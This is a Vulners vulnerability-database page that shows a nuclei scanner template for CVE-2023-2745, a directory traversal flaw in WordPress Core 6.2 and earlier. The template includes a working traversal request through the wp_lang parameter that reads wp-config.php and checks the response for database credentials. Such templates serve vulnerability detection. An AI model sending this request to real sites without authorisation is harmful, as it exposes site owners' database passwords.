Lucene search
K

WordPress Core <=6.2 - Directory Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 59 Views

WordPress Core <=6.2 - Directory Traversal vulnerability allows unauthenticated attackers to access and load arbitrary translation file

Related
Refs
Code
id: CVE-2023-2745

info:
  name: WordPress Core <=6.2 - Directory Traversal
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2745
    - https://www.cvedetails.com/cve/CVE-2023-2745/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2745
    cwe-id: CWE-22
    epss-score: 0.79527
    epss-percentile: 0.99558
  metadata:
    max-request: 2
    framework: wordpress
  tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi,vuln,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins")'
        internal: true

  - raw:
      - |
        GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "DB_NAME", "DB_PASSWORD")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402201d7570123028f48e448a353b988f6ec2a4c76483638f5dffceab0d3e2875f80602205f462f47871b33b87bb66fc527a5ea60eb05cb7421caf6e768c16bcb1c6c0da2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.15.4 - 6.1
EPSS0.79527
SSVC
59